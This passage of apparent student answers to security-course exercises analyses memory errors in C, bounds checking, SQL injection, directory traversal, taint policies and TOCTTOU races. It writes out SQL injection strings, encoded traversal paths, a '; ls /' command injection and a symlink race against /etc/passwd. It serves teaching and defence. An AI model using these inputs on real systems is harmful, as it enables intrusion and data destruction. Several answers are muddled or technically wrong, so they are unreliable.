    *p = s[i];
  }
  /* Point (1) */
  if (p >= &t[32]) p--;
  *p = '\0';
  return t;           --> it returns the address of a local (temporal error)
}

int main() {
  char *r = "0123456789012345678901234567890123456789";
  char *q;
  char *u;
  int *v;
  int i, j;
  bb = (struct B *)&ca;       --> struct B can be bigger than struct C (char * vs int), so bb might overflow
  printf(bb->c);              --> since it was not initialized, this prints an address
  printf(bb->c1);
  bb = (struct B *)malloc(sizeof(struct B));   --> it had the address of struct C but now allocates the size of struct B
  for (i = 0; 1; i += 6) {
    bb->d[i] = '\0';
    if (i > 30) break;        --> breaks with i == 36, bb->d[36], with the last '\0' at bb->d[30]: overflow
  }
  for (v = &bb->e[0]; v < &bb->e[17]; v += 4)   --> gets the address of e[0], but e was overflowed by the last loop
    *v = 0;                   --> v == 0, 4, 8, 12, 16, 18, so it overflows at v = &bb->e[18]
  j = (int)v;
  j -= 20;                    --> first, j is not a pointer (int to pointer, the value is an address) and its
                                  value goes beyond bounds: buffer underflow!!!!
  v -= 2;                     --> v == -2!!!, 2, 6, 8, 12, 16
  *v = 0;                     --> buffer underflow
  bb->c = malloc(32);
  bcopy(bb, &ba, sizeof(struct B));   --> the string c had 32 bytes allocated and goes to the address of an int f
                                          (which is not a pointer); bb is already overflowed, so this overflows
                                          into the address of &ba (32+18+30+.. >= 100...)
  aa.a = r;                   --> the previous overflow can affect the content of *r
  aa.b += 42;                 --> b was not initialized and it has the value of the overflow, offset by 42
  if (*aa.a == '\0') {        --> reads the value at that address!!!
    printf("ZERO!");
    q = ff(r);                --> should be *q = ff(r) since it returns a value (t); it is ok only if we wanted
                                  t's address; also, r here is modified because of the overflow: temporal error
    u = ff(q);
  }
  v--;                        --> v ended at v == 16, so it goes to v == 14: dangling pointer (temporal)
  *v = 0;
  v = (int *)j;               --> j went very far beyond bounds and v is now there
  *v = 0;                     --> buffer underflow
  freeB(bb);                  --> it is not going to free c, since c got null values because of the overflows,
                                  but it does free the struct!!!!
  printf(ba.c);               --> prints the wrong c (not ba's!!!!), a temporal error
  return 0;
}
-------------------------------------------------------------------------
-------------------------------------------------------------------------
(b) Assuming the use of the Kelly and Jones bounds-checking method, show the contents of the splay tree at "Point (1)" in the second invocation of ff() in the above program.

In Jones and Kelly bounds checking, every time memory is allocated, the beginning and end of the variable are stored in a data structure such as a splay tree (for instance: static variables at the beginning of the program; local variables at the entry of each function, deleted at its exit; malloc operations followed by free). Therefore, all pointers must be derived from existing pointers to valid objects. (Jones and Kelly also pad 1 extra byte to account for the address one past the bound of the array.)

Without taking into account all of the errors found earlier in the code, the splay tree of ff() shows the offsets that each variable should have (where p = t means that we do not need to mask *p = &t[0]):

First call:
  object              start   end
  pointer (*s == *r)    x     42
  buf (t)               x     32
  pointer (*p)          x     31

Second call:
  object              start   end
  pointer (*s == *q)    x     31
  buf (t)               x     32
  pointer (*p)          x     30

But we know that we had an overflow, and we have an address returned by the first ff() and inserted into the second ff(). For the first problem, it would result in an offset in the addresses of the local variables of ff(). This calculates things waaaay out of bounds!!!! In the second problem we would have *p never being > &t[32] with no '\0', so it could take on all the values of *r. This results in the second call being overflowed, giving *p an address away from &t. Another point is that one of the problems described in (a) is in the malloc call, which comes right before the pointer to r. If we wrapped malloc with bounds-checking approaches, the information about the objects could still be in the splay tree!
So we need to check the pointer arithmetic, not the dereferences!

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(c) Which pointers have the value of an out-of-bounds object at "Point (1)" in the second invocation of ff()? For each of them, identify the associated metadata.

We associate a pointer_info with metadata for each pointer (and we can do the same for structs, associating a struct_info with metadata for each struct, which would help a lot in this code). The metadata contains the base address and the allocated size of each memory block. A unique capability can be associated with each block to avoid temporal errors, in our case helping with the dangling pointer of ff().

*s is OOB of *r      --> r_info metadata: size = 42, (relative) address y0 (global variables)
*p is OOB of &t[32]  --> t_info metadata: size = 32+1, (relative) address z0 (local variables),
                         capability to the block (for temporal errors)

So the OOB object is used to store the original base address of the pointer, and after the pointer arithmetic we maintain additional metadata to compute the location from which the new metadata was obtained.

***********************************************************************
***********************************************************************
***********************************************************************
40) SQL INJECTIONS

Consider the following code snippet. Does it have one or more SQL injection vulnerabilities? If not, justify. Otherwise, identify each vulnerability and develop a corresponding exploit.
(UID: REMOVE ' AND " FROM A STRING AND THEN EXECUTE A COMMAND)
-------------------------------------------------------------------------------------
01 char *f1 = get_form_field("f1");
   char *f2 = get_form_field("f2");
   char *f3, *f4, *f5, *uid, *p, *q;
04 for (char *p = f1; (*p != '\0'); p++) {
     if ((*p == '\'') || (*p == '"'))       /* Replace unescaped quotes with '_' */
06     if (p > f1)
         if (*(p-1) != '\\')                /* escape character */
           { *p = '_'; }
   }
   f3 = malloc(strlen(f1)+100);
13 sprintf(f3, "SELECT uid FROM users WHERE username = '%s'", f1);
14 .... /* Send the query f3 to the database and store the result into uid */

(EMAIL: REMOVE -- FROM A STRING; IF A CHARACTER IS NOT alphanumeric, -, _, @ OR ., SKIP IT)
--------------------------------------------------------------------------------
15 f4 = malloc(strlen(f2)+1);
16 for (q = f2, p = f4; (*q != '\0');) {
     if (*q == '-') {
       if (*(q+1) == '-') {                 /* "--" signifies a comment in SQL: we don't want to permit them */
         q += 2; continue;
       }
     }
21   else if (!isalnum(*q) && (*q != '-') && (*q != '_') && (*q != '@') && (*q != '.')) {
       q++; continue;
     }
     *p++ = *q++;
   }
27 *p = '\0';
28 f5 = malloc(strlen(f4)+strlen(uid)+100);
29 sprintf(f5, "UPDATE users SET email = %s WHERE uid = %s", f4, uid);
30 .... /* Send f5 to the database */
-------------------------------------------------------------------------------------

These snippets are exploitable at the point where sprintf builds the command from the user input. The injection occurs because the user input is not correctly filtered for escape characters. Some of the exploits are:

1) In line 06, a quote in the FIRST character of the string is not replaced, for f1 = ""ATTACKCOMMAND;'. An example could be "" OR uid =0;' (so the attacker can change the email of any user).

2) Another possible problem is incorrect type handling, since the code does not check whether f1 yields a numeric field for uid, for example using 1;ATTACKCOMMAND (such as DROP, DELETE, etc.).
3) Preparing for the second part, we can have our uid written with SQL comments, since they are not filtered: --, ({, /*

4) In the second part, if uid is not a number but was modified as above, we have our ATTACKCOMMAND crafted.

***********************************************************************
***********************************************************************
***********************************************************************
41) DIRECTORY TRAVERSAL ATTACK

Is the following code vulnerable to a directory traversal attack? The goal of such an attack would be to list a directory that is outside of the document root /var/www/html chosen by the server code below. If the code is vulnerable, develop an attack on the server. Note that popen is a standard C library function used to execute a shell command. If the second argument is the string "r" then the output of the command can be read from the stream returned by popen.

--------------------------------------------------------------
1  char *s = get_form_field("path");
2  char *p;
3  int depth = 0;
4  if ((strstr(s, "/./") != NULL) || (strstr(s, "//") != NULL)) {
     /* return error message */
   }
6  for (depth = 0, p = s; (*p != '\0');) {
7    if ((*p == '.') && (*(p+1) == '.') && (*(p+2) == '/')) {
       depth--;
       p += 3;
     }
10   else {
       while ((*p != '/') && (*p != '\0')) p++;
       if (*p == '/') {
         depth++;
         p++;
       }
     }
   }
18 if (depth >= 0) {
     char *cmd = malloc(strlen(s)+100);
     char *c1 = "ls /var/www/html";
     char *p, *q;
     FILE *fp;
     for (p = cmd, q = c1; (*q != '\0'); p++, q++) *p = *q;
     *p++ = '/';
     for (q = s; (*q != '\0'); p++, q++) *p = *q;
     fp = popen(cmd, "r");
     /* read the data from fp and return it to the client */
30 } else {
     /* return error message */
   }
-------------------------------------------------------------

1) This code has protection against attacks of the type "/../../../../attackfile" but not against other forms of traversal attack, such as strings whose attack path is percent encoded (URL encoding) or even multiple
percent encoding: ../ is %2e%2e%2f or %2e%2e/ or ..%2f, and / is %c1%1c.

2) In line 7, the if only excludes "../" but not "..", which lists /var/www/ and could be used for iteration.

3) The code also has weaknesses such as the possibility of a string "; ls /".

***********************************************************************
***********************************************************************
***********************************************************************
42) TAINT-TRACKING

(a) If only data dependencies are tracked, identify the variables that would be tainted at the end of the code snippet. For each such variable, identify the bytes that are tainted. A one-bit taint-tag can be used for each byte of memory, with 0 representing the absence of taint. Therefore, the taint bit associated with a byte at address a is tagmap[a].

If only data is tracked:

  Variable   Tainted (E)
  s          tag(s, sizeof(*s))
  c1         0 (a constant is not tainted)

(Some of these variables are also tainted by explicit flow: i) the result of an arithmetic expression is tainted if any of its variables is tainted; ii) a variable is tainted by assignment from a tainted variable.)

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(b) Describe precisely a policy that can detect command injection attacks using taint information.

In this kind of attack, if the path contains the attack strings (../, %2e%2e%2f, etc.), then the real path should not go beyond the top level allowed by the server. First, we define taint-annotated regular expressions (TARE) with the annotations ^t, ^T or ^u:

  a string s matches a TARE r^t if s matches r and at least one character c of s is tainted;
  a string s matches a TARE r^T if s matches r and every character c of s is tainted;
  a string s matches a TARE r^u if s matches r and no character c of s is tainted.

Then, the policies could be as in [2]:

  DirTraversalModifier = '..' || '%2e%2e%2f' ...
  file_function(path) = open(path) || unlink(path) ...
  file_function(path) | path matches any* (DirTraversalModifier)^T any* && escapeRootDir(path) -> reject()

Also, a taint-enhanced policy can be used to enforce a restrictive policy on file access when the file name is tainted, not allowing access outside of the document directory but still allowing access to error logs, etc.

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(c) How will your answer to part (a) change if control dependencies are tracked as well?

Control-dependence taint concerns the control flow conditions on a control variable, i.e. the case in which flow takes place from x to y without an assignment involving x and y, but within a conditional on x.

  Variable   Tainted
  p          tag(p, sizeof(*p))
  p (loop)   tag(q, sizeof(*q))
  q          tag(q, sizeof(*q))

***********************************************************************
***********************************************************************
***********************************************************************
43) RACE CONDITION

Consider a program that is used to restore files from a backup. In order that it can restore the files belonging to any user and set the appropriate ownership and permissions on the restored file, the restore program will be run with root privileges. (If it matters, assume that the real uid and saved uid will also be 0.) Assume that the restore program executes the following steps for each file to be restored:

1. read file name f, file content fc, file owner fo, file group fg, and file permission fp from the backup.   [open, access, stat]
2. create file f.   [create]
3. restore its content fc.   [write(fc, buffer, sizeof(buffer))]
4. set its permission fp.   [chmod]
5. change ownership of file to fo.   [chown]
6. change group ownership of f to fg.   [chmod]

----------------------------------------------------------------------------
(a) Identify TOCTTOU vulnerabilities in this program. If there are multiple such vulnerabilities, identify them all. Describe an attack against each identified vulnerability.

TOCTTOU attacks arise when an application tries to protect itself against name-based attacks. Programmers should always disable signals before entering privileged mode. In this case we have:

1) open, access: to read the file, it needs the access system call (setuid program). Example:
   * Mislead privileged programs, steal sensitive information, symlink.
   * AT: create(/tmp/x); US: access(/tmp/x) = ok; AT: unlink(/tmp/x), symlink(/tmp/x -> /etc/passwd); US: open(/tmp/x), overwriting passwd.
2) chmod. Example:
   * Gain unauthorized access rights to /etc/passwd.
3) chown. Example:
   * Change the ownership of /etc/passwd.

-------------------------------------------------------------------------
-------------------------------------------------------------------------
(b) For each vulnerability, identify a simple modification to the code that would eliminate the vulnerability.

1) access/open: access should never be used; use exception handling instead of check-then-restore. access and open should never be called on the same filename.
2) chmod/chown: first open the file and then use the operations on open files (the fchown(), fstat() and fchmod() system calls).

-------------------------------------------------------------------------
-------------------------------------------------------------------------
1 - The Protection of Information in Computer Systems.
2 - Abraham Silberschatz et al., Operating System Concepts.
3 - Matt Bishop, Introduction to Computer Security.
4 - Charles P. Pfleeger, Security in Computing.
5 - Ross Anderson, Security Engineering.
6 - Grampp and Morris, Unix Operating System Security, 1984.
7 - M. Bellare et al., Provably Fixing the SSH Binary Packet Protocol, 2002.
8 - G. Bard, Vulnerability of SSL to Chosen-Plaintext Attack, 2004.
9 - Matt Bishop, Introduction to Computer Security, Addison Wesley, 2004.
10 - Gene Spafford, Security Myths and Passwords, 2006.
11 - Charles P. Pfleeger, Security in Computing, Prentice-Hall, 2006.
12 - Ross Anderson, Security Engineering, Wiley, 2008.
13 - M. Albrecht, Plaintext Recovery Attacks Against SSH, 2009.